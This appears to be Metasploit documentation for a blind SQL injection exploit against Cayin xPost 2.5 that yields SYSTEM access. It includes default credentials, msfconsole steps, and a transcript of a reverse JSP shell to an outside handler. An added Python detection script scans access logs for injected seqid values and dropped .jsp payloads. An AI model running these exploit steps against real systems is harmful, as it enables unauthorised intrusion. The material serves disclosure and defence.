Vulnerable Application
This module exploits an unauthenticated blind SQL injection in Cayin xPost <= 2.5.
The injection point is the wayfinder_seqid parameter of the wayfinder_meeting_input.jsp
file. Because the application bundles its own MySQL and Apache Tomcat, the environment is
largely fixed, so the module's default settings should work without adjustment. Successful
exploitation results in SYSTEM-level access. Only the java/jsp_shell_reverse_tcp and
java/jsp_shell_bind_tcp payloads appear to be valid.
The default credentials for the system are administrator:admin (from the guide, page 16).
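The module output below shows the two artifacts a defender can look for: requests to wayfinder_meeting_input.jsp whose wayfinder_seqid value is not a plain ID, and a randomly named .jsp payload written into the Cayin webapps folder (LOCALWEBROOT, default C:/CayinApps/webapps/). The following script is an added detection example, not code from the Metasploit module or its documentation. It assumes a Tomcat access log in the common "%h %l %u %t \"%r\" %s %b" layout, assumes legitimate wayfinder_seqid values are integers, and treats the 12-character mixed-case payload name seen in the transcript (cY0bWf1Rh6C9.jsp) as a heuristic for dropped payload files; the sample log lines are constructed.

```python
"""Defender-side checks for the Cayin xPost wayfinder_seqid SQLi (added example).

Assumptions (not stated on the page):
- Tomcat access log lines follow the common pattern "%h %l %u %t \"%r\" %s %b".
- Legitimate wayfinder_seqid values are plain integers.
- Payload files dropped by the module look like cY0bWf1Rh6C9.jsp: 12 mixed-case
  alphanumerics followed by .jsp (heuristic based on the one name in the transcript).
"""
import re
from urllib.parse import parse_qs, urlsplit

ACCESS_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<bytes>\S+)'
)
SEQID_OK = re.compile(r'^\d+$')                      # expected shape of a real seqid
RANDOM_JSP = re.compile(r'^/(?:[^/]+/)*[A-Za-z0-9]{12}\.jsp$')  # heuristic payload name


def parse_access_line(line):
    """Parse one access-log line into a dict; return None if it does not match."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # parse_qs already percent-decodes values, so "12%27" arrives as "12'"
    rec['query'] = parse_qs(parts.query, keep_blank_values=True)
    return rec


def check_line(line):
    """Return (reason, detail) findings for one access-log line."""
    rec = parse_access_line(line)
    if rec is None:
        return []
    findings = []
    if rec['path'].endswith('/wayfinder_meeting_input.jsp'):
        for val in rec['query'].get('wayfinder_seqid', []):
            if not SEQID_OK.match(val):
                findings.append(('non-numeric wayfinder_seqid', val))
    if RANDOM_JSP.match(rec['path']):
        findings.append(('request for random-looking jsp', rec['path']))
    return findings


def scan_log(lines):
    """Scan an iterable of log lines; return (line_no, reason, detail) tuples."""
    out = []
    for n, line in enumerate(lines, 1):
        for reason, detail in check_line(line):
            out.append((n, reason, detail))
    return out


def unexpected_jsp_files(current, baseline):
    """Compare a directory listing of the webroot (e.g. os.listdir of
    C:/CayinApps/webapps/) against a known-good set of .jsp names and return
    the .jsp files that are not in the baseline."""
    return sorted(f for f in current
                  if f.lower().endswith('.jsp') and f not in baseline)


# Constructed sample log lines: one benign request, one with a quote in the
# seqid, one fetch of a payload-style filename (URL path is assumed).
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jun/2020:12:19:50 -0400] '
    '"GET /xPost/wayfinder_meeting_input.jsp?wayfinder_seqid=12 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [09/Jun/2020:12:20:10 -0400] '
    '"GET /xPost/wayfinder_meeting_input.jsp?wayfinder_seqid=12%27 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [09/Jun/2020:12:20:31 -0400] '
    '"GET /cY0bWf1Rh6C9.jsp HTTP/1.1" 200 0',
]

if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print('line %d: %s (%s)' % hit)
    # Constructed listing: the payload file is not in the baseline
    print(unexpected_jsp_files(['wayfinder_meeting_input.jsp', 'cY0bWf1Rh6C9.jsp', 'ROOT'],
                               {'wayfinder_meeting_input.jsp'}))
```

Run it against the real access log with `scan_log(open(path))`; for the webroot check, feed `os.listdir` of the LOCALWEBROOT directory and a baseline captured from a clean install, so that any .jsp not shipped with xPost stands out even when the module's cleanup attempt (the "unknown result" line below) did remove the file from the log's point of view but not from disk.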
Verification Steps
- Install the application and start it
- Start msfconsole
- Do: use exploit/windows/http/cayin_xpost_sql_rce
- Do: set rhosts [ip]
- Do: run
- You should get a shell.
Options
LOCALWEBROOT: Path to the webapps folder for Cayin. Defaults to C:/CayinApps/webapps/
Scenarios
Cayin xPost 2.5 on Windows 10.0.16299.125
[*] Processing xpost.rb for ERB directives.
resource (xpost.rb)> use exploit/windows/http/cayin_xpost_sql_rce
resource (xpost.rb)> set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
resource (xpost.rb)> set rhosts 2.2.2.2
rhosts => 2.2.2.2
resource (xpost.rb)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (xpost.rb)> set verbose true
verbose => true
resource (xpost.rb)> exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Utilizing payload filename cY0bWf1Rh6C9.jsp
[*] Payload Size: 1499
[*] Payload Size Encoded: 2998
[*] Attempting Exploitation
[*] Triggering uploaded payload
[*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:50158) at 2020-06-09 12:20:33 -0400
[!] Tried to delete C:/CayinApps/webapps/cY0bWf1Rh6C9.jsp, unknown result
C:\CayinApps\Tomcat>
C:\CayinApps\Tomcat>whoami
whoami
nt authority\system
C:\CayinApps\Tomcat>ver
ver
Microsoft Windows [Version 10.0.16299.125]
C:\CayinApps\Tomcat>